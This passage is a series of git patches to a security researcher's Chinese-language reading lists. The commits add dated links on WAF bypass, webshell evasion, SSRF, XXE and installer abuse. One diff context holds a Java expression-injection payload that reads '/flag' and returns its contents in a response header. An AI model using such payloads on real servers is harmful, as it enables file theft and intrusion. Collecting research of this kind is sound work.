waf](https://lab.wallarm.com/waf-json-decoding-capability-required-to-protect-against-api-threats-like-cve-2020-13942-apache-unomi-rce/) **json 默认支持 unicode 编码** + 2023/02/10 [红队攻防实践:unicode进行webshell免杀的思考](https://mp.weixin.qq.com/s?__biz=MzI4MzA0ODUwNw==&mid=2247484997&idx=1&sn=8694814291d80337928e59afd3034b4c&chksm=eb91e911dce6600735f1d4fae65fb01c682fe9bddc3e72a67d2ae993baac5ccc1f93c1924467&cur_album_id=1342350211271966722&scene=189#wechat_redirect) **里面的零宽连接符ZWJ有意思** [零宽字符妙用](https://1991421.cn/2021/03/08/3c5b1b78/) + 2023/02/11 [PWN2OWNING TWO HOSTS AT THE SAME TIME: ABUSING INDUCTIVE AUTOMATION IGNITION’S CUSTOM DESERIALIZATION](https://www.zerodayinitiative.com/blog/2023/2/6/pwn2owning-two-hosts-at-the-same-time-abusing-inductive-automation-ignitions-custom-deserialization) ++ 2023/02/14 [环境变量的利用](https://www.elttam.com/blog/env/#content) **np的** From ac094e42846e39b6174bb1bfc673d45d2f0d322d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 14 Feb 2023 15:56:44 +0800 Subject: [PATCH 278/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b3be6a3..70028f4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -272,3 +272,4 @@ + 2023/02/10 [红队攻防实践:unicode进行webshell免杀的思考](https://mp.weixin.qq.com/s?__biz=MzI4MzA0ODUwNw==&mid=2247484997&idx=1&sn=8694814291d80337928e59afd3034b4c&chksm=eb91e911dce6600735f1d4fae65fb01c682fe9bddc3e72a67d2ae993baac5ccc1f93c1924467&cur_album_id=1342350211271966722&scene=189#wechat_redirect) **里面的零宽连接符ZWJ有意思** [零宽字符妙用](https://1991421.cn/2021/03/08/3c5b1b78/) + 2023/02/11 [PWN2OWNING TWO HOSTS AT THE SAME TIME: ABUSING INDUCTIVE AUTOMATION IGNITION’S CUSTOM DESERIALIZATION](https://www.zerodayinitiative.com/blog/2023/2/6/pwn2owning-two-hosts-at-the-same-time-abusing-inductive-automation-ignitions-custom-deserialization) + 2023/02/14 [环境变量的利用](https://www.elttam.com/blog/env/#content) **np的** ++ 2023/02/14 [GHSL-2021-1009: URL access filters bypass in Alpine - CVE-2022-23553](https://securitylab.github.com/advisories/GHSL-2021-1009-Alpine/) **很多这样的bypass权限的利用** From b503047ef4c3079a5a705a93c01eb2c8e5e4f15d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 16 Feb 2023 00:11:53 +0800 Subject: [PATCH 279/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 70028f4..d955a35 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -273,3 +273,4 @@ + 2023/02/11 [PWN2OWNING TWO HOSTS AT THE SAME TIME: ABUSING INDUCTIVE AUTOMATION IGNITION’S CUSTOM DESERIALIZATION](https://www.zerodayinitiative.com/blog/2023/2/6/pwn2owning-two-hosts-at-the-same-time-abusing-inductive-automation-ignitions-custom-deserialization) + 2023/02/14 [环境变量的利用](https://www.elttam.com/blog/env/#content) **np的** + 2023/02/14 [GHSL-2021-1009: URL access filters bypass in Alpine - CVE-2022-23553](https://securitylab.github.com/advisories/GHSL-2021-1009-Alpine/) **很多这样的bypass权限的利用** ++ 2023/02/16 [XXE with Auto-Update in install4j](https://frycos.github.io/vulns4free/2023/02/12/install4j-xxe.html) **这个思路非常好,很多产品自动更新的时候去server端解析传递过来的xml格式就可能造成xxe。我们只需要evil server就可以完成攻击** From cc284e79c6d34b2f343a438c11c99854c2d0f43f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 18 Feb 2023 22:31:23 +0800 Subject: [PATCH 280/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d955a35..4932f67 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -274,3 +274,4 @@ + 2023/02/14 [环境变量的利用](https://www.elttam.com/blog/env/#content) **np的** + 2023/02/14 [GHSL-2021-1009: URL access filters bypass in Alpine - CVE-2022-23553](https://securitylab.github.com/advisories/GHSL-2021-1009-Alpine/) **很多这样的bypass权限的利用** + 2023/02/16 [XXE with Auto-Update in install4j](https://frycos.github.io/vulns4free/2023/02/12/install4j-xxe.html) **这个思路非常好,很多产品自动更新的时候去server端解析传递过来的xml格式就可能造成xxe。我们只需要evil server就可以完成攻击** ++ 2023/02/18 [https://mp.weixin.qq.com/s/ff6LsT2j1OY1lv-_9gJN2A](顶级Javaer都在使用的类库,真香!) **可以记录一下** From 4e0ce4ecefb4d473bf9604f203e102eb9fc9c419 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 19 Feb 2023 21:12:18 +0800 Subject: [PATCH 281/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4932f67..ba1ceb2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -275,3 +275,4 @@ + 2023/02/14 [GHSL-2021-1009: URL access filters bypass in Alpine - CVE-2022-23553](https://securitylab.github.com/advisories/GHSL-2021-1009-Alpine/) **很多这样的bypass权限的利用** + 2023/02/16 [XXE with Auto-Update in install4j](https://frycos.github.io/vulns4free/2023/02/12/install4j-xxe.html) **这个思路非常好,很多产品自动更新的时候去server端解析传递过来的xml格式就可能造成xxe。我们只需要evil server就可以完成攻击** + 2023/02/18 [https://mp.weixin.qq.com/s/ff6LsT2j1OY1lv-_9gJN2A](顶级Javaer都在使用的类库,真香!) **可以记录一下** ++ 2023/02/19 [Java代码审计项目--某在线教育开源系统](https://mp.weixin.qq.com/s/4sZWD792zxLIkIXPk01yhA) **这个流程是比较好的,看一些过滤器和监听器** From f3396a31db8d7b0fde4404991fd9a08f2f105937 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 19 Feb 2023 23:54:43 +0800 Subject: [PATCH 282/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ba1ceb2..b5df6e9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -276,3 +276,4 @@ + 2023/02/16 [XXE with Auto-Update in install4j](https://frycos.github.io/vulns4free/2023/02/12/install4j-xxe.html) **这个思路非常好,很多产品自动更新的时候去server端解析传递过来的xml格式就可能造成xxe。我们只需要evil server就可以完成攻击** + 2023/02/18 [https://mp.weixin.qq.com/s/ff6LsT2j1OY1lv-_9gJN2A](顶级Javaer都在使用的类库,真香!) **可以记录一下** + 2023/02/19 [Java代码审计项目--某在线教育开源系统](https://mp.weixin.qq.com/s/4sZWD792zxLIkIXPk01yhA) **这个流程是比较好的,看一些过滤器和监听器** ++ 2023/02/19 [关于使用OCR文字识别方式进行免杀](https://xz.aliyun.com/t/12114) **好思路啊** From e13aa0d4fe761514ead4608b66d4afd3a03a6ea4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 20 Feb 2023 13:48:16 +0800 Subject: [PATCH 283/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b5df6e9..51cc13e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -277,3 +277,4 @@ + 2023/02/18 [https://mp.weixin.qq.com/s/ff6LsT2j1OY1lv-_9gJN2A](顶级Javaer都在使用的类库,真香!) **可以记录一下** + 2023/02/19 [Java代码审计项目--某在线教育开源系统](https://mp.weixin.qq.com/s/4sZWD792zxLIkIXPk01yhA) **这个流程是比较好的,看一些过滤器和监听器** + 2023/02/19 [关于使用OCR文字识别方式进行免杀](https://xz.aliyun.com/t/12114) **好思路啊** ++ 2023/02/20 [redis安全学习小记](https://mp.weixin.qq.com/s/W9joCtUQfNA62ZWXwqMmsw) **redis安全学习** From 71c867e35aee0a2fc12925d5e0586b1e0d74e3df Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 20 Feb 2023 14:03:49 +0800 Subject: [PATCH 284/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 51cc13e..e99a5ff 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -278,3 +278,4 @@ + 2023/02/19 [Java代码审计项目--某在线教育开源系统](https://mp.weixin.qq.com/s/4sZWD792zxLIkIXPk01yhA) **这个流程是比较好的,看一些过滤器和监听器** + 2023/02/19 [关于使用OCR文字识别方式进行免杀](https://xz.aliyun.com/t/12114) **好思路啊** + 2023/02/20 [redis安全学习小记](https://mp.weixin.qq.com/s/W9joCtUQfNA62ZWXwqMmsw) **redis安全学习** ++ 2023/02/20 [一次“SSRF-->RCE”的艰难利用](https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247483865&idx=1&sn=41e56040229e383a82a671fc359ee82b&chksm=f9ee6d66ce99e470d102becfcf63955f2aae1d88bc43ef8e7939bc93d786ff2f994eac969d32&scene=21&sessionid=1586255695&key=c00e1a5b49adb240be940797e7d3cb821bae9b89771be268faa858b2888bbba3e96562ccac53df81389cb41e548a9e6412d4f83b6b7b541825630aa6ace9d1d040a3b7cd677b5ca137cc9b1d2297948e&ascene=1&uin=MzE0MDM4MzExMw==&devicetype=Windows%2010&version=62080079&lang=zh_CN&exportkey=A6a52QI1M4H5IGXp8ekqTtY=&pass_ticket=awXcPg/ApqlfbrG8njT11ZZYAGjwbhrnExtbvARh//rtbsupQLnZBKBPE6SCXvhn#wechat_redirect) **学习** From d29418b5c34566a622647549ba52971f1ad1bad6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 20 Feb 2023 23:16:45 +0800 Subject: [PATCH 285/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e99a5ff..190a594 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -279,3 +279,4 @@ + 2023/02/19 [关于使用OCR文字识别方式进行免杀](https://xz.aliyun.com/t/12114) **好思路啊** + 2023/02/20 [redis安全学习小记](https://mp.weixin.qq.com/s/W9joCtUQfNA62ZWXwqMmsw) **redis安全学习** + 2023/02/20 [一次“SSRF-->RCE”的艰难利用](https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247483865&idx=1&sn=41e56040229e383a82a671fc359ee82b&chksm=f9ee6d66ce99e470d102becfcf63955f2aae1d88bc43ef8e7939bc93d786ff2f994eac969d32&scene=21&sessionid=1586255695&key=c00e1a5b49adb240be940797e7d3cb821bae9b89771be268faa858b2888bbba3e96562ccac53df81389cb41e548a9e6412d4f83b6b7b541825630aa6ace9d1d040a3b7cd677b5ca137cc9b1d2297948e&ascene=1&uin=MzE0MDM4MzExMw==&devicetype=Windows%2010&version=62080079&lang=zh_CN&exportkey=A6a52QI1M4H5IGXp8ekqTtY=&pass_ticket=awXcPg/ApqlfbrG8njT11ZZYAGjwbhrnExtbvARh//rtbsupQLnZBKBPE6SCXvhn#wechat_redirect) **学习** ++ 2023/02/20 [五一快乐-微某OA从0day流量分析到武器化利用](https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw) From 1f02625eb06ca1416d472985025e19a948f56ea9 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 23 Feb 2023 14:26:43 +0800 Subject: [PATCH 286/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 190a594..d0965a9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -280,3 +280,4 @@ + 2023/02/20 [redis安全学习小记](https://mp.weixin.qq.com/s/W9joCtUQfNA62ZWXwqMmsw) **redis安全学习** + 2023/02/20 [一次“SSRF-->RCE”的艰难利用](https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247483865&idx=1&sn=41e56040229e383a82a671fc359ee82b&chksm=f9ee6d66ce99e470d102becfcf63955f2aae1d88bc43ef8e7939bc93d786ff2f994eac969d32&scene=21&sessionid=1586255695&key=c00e1a5b49adb240be940797e7d3cb821bae9b89771be268faa858b2888bbba3e96562ccac53df81389cb41e548a9e6412d4f83b6b7b541825630aa6ace9d1d040a3b7cd677b5ca137cc9b1d2297948e&ascene=1&uin=MzE0MDM4MzExMw==&devicetype=Windows%2010&version=62080079&lang=zh_CN&exportkey=A6a52QI1M4H5IGXp8ekqTtY=&pass_ticket=awXcPg/ApqlfbrG8njT11ZZYAGjwbhrnExtbvARh//rtbsupQLnZBKBPE6SCXvhn#wechat_redirect) **学习** + 2023/02/20 [五一快乐-微某OA从0day流量分析到武器化利用](https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw) ++ 2023/02/23 [实战 | 记一次针对非法网站的SSRF渗透](https://mp.weixin.qq.com/s/yfWAu6ebXA14GfOTP86XsA) From 68e880256f1f0caa55e67c1c47f9cc1bd274001f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 24 Feb 2023 18:24:28 +0800 Subject: [PATCH 287/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d0965a9..ecda1e9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -281,3 +281,4 @@ + 2023/02/20 [一次“SSRF-->RCE”的艰难利用](https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247483865&idx=1&sn=41e56040229e383a82a671fc359ee82b&chksm=f9ee6d66ce99e470d102becfcf63955f2aae1d88bc43ef8e7939bc93d786ff2f994eac969d32&scene=21&sessionid=1586255695&key=c00e1a5b49adb240be940797e7d3cb821bae9b89771be268faa858b2888bbba3e96562ccac53df81389cb41e548a9e6412d4f83b6b7b541825630aa6ace9d1d040a3b7cd677b5ca137cc9b1d2297948e&ascene=1&uin=MzE0MDM4MzExMw==&devicetype=Windows%2010&version=62080079&lang=zh_CN&exportkey=A6a52QI1M4H5IGXp8ekqTtY=&pass_ticket=awXcPg/ApqlfbrG8njT11ZZYAGjwbhrnExtbvARh//rtbsupQLnZBKBPE6SCXvhn#wechat_redirect) **学习** + 2023/02/20 [五一快乐-微某OA从0day流量分析到武器化利用](https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw) + 2023/02/23 [实战 | 记一次针对非法网站的SSRF渗透](https://mp.weixin.qq.com/s/yfWAu6ebXA14GfOTP86XsA) ++ 2023/02/24 [【剖析 | SOFARPC 框架】之 SOFARPC 序列化比较](https://www.sofastack.tech/blog/sofa-rpc-serialization-comparison/) From d3faec268f216b3d67813d249a772e8f2d059165 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 2 Mar 2023 22:11:15 +0800 Subject: [PATCH 288/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ecda1e9..d007b10 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -282,3 +282,4 @@ + 2023/02/20 [五一快乐-微某OA从0day流量分析到武器化利用](https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw) + 2023/02/23 [实战 | 记一次针对非法网站的SSRF渗透](https://mp.weixin.qq.com/s/yfWAu6ebXA14GfOTP86XsA) + 2023/02/24 [【剖析 | SOFARPC 框架】之 SOFARPC 序列化比较](https://www.sofastack.tech/blog/sofa-rpc-serialization-comparison/) ++ 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 8f5b383daf528198c5a5a3af50847a27ac338569 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 2 Mar 2023 22:26:27 +0800 Subject: [PATCH 289/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d007b10..34b177d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -283,3 +283,4 @@ + 2023/02/23 [实战 | 记一次针对非法网站的SSRF渗透](https://mp.weixin.qq.com/s/yfWAu6ebXA14GfOTP86XsA) + 2023/02/24 [【剖析 | SOFARPC 框架】之 SOFARPC 序列化比较](https://www.sofastack.tech/blog/sofa-rpc-serialization-comparison/) + 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From a647c3832d3d6ee4f99d95cab58579f36286c394 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 2 Mar 2023 23:35:08 +0800 Subject: [PATCH 290/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 34b177d..343a0e9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -284,3 +284,4 @@ + 2023/02/24 [【剖析 | SOFARPC 框架】之 SOFARPC 序列化比较](https://www.sofastack.tech/blog/sofa-rpc-serialization-comparison/) + 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/03/02 [【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** From bb2868e6ac6d1d7dd3db990593907d155c71aa67 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 5 Mar 2023 19:08:05 +0800 Subject: [PATCH 291/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 343a0e9..93ff134 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -285,3 +285,4 @@ + 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** ++ 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** From 1edd6659cf14d966231c3df6fec6cb88ad485dd9 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 5 Mar 2023 19:17:10 +0800 Subject: [PATCH 292/332] Update Readme.md --- shell/SPEL/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index 82b8808..e989f3e 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md @@ -113,6 +113,8 @@ print(')}') 其他bypass: https://xz.aliyun.com/t/9245 +https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/ + ## springboot回显 ``` Java.type("org.springframework.web.context.request.RequestContextHolder").currentRequestAttributes().getResponse().addHeader("test",new java.lang.String(Java.type("sun.misc.IOUtils").readFully(new java.io.FileInputStream("/flag"),1024,false))); From ee15da5ce535972548f4b2621fd8046414925caa Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 5 Mar 2023 19:18:28 +0800 Subject: [PATCH 293/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 93ff134..af19bb5 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -285,4 +285,4 @@ + 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** -+ 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** ++ 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** [Threat Analysis: MSI - Masquerading as a Software Installer](https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer) From f27ab7aa58e9fe5a51fa6a996a7dc7489179428e Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 7 Mar 2023 13:41:19 +0800 Subject: [PATCH 294/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index af19bb5..e25be21 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -286,3 +286,4 @@ + 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** + 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** [Threat Analysis: MSI - Masquerading as a Software Installer](https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer) ++ 2023/03/07 [为什么 Nginx 比 Apache 更牛叉?](https://mp.weixin.qq.com/s/nz0OZsa0rEyF5L40rD5zYg) From 7c826d0ce4ef148e0ff87af5e6a2557df40e46fe Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 8 Mar 2023 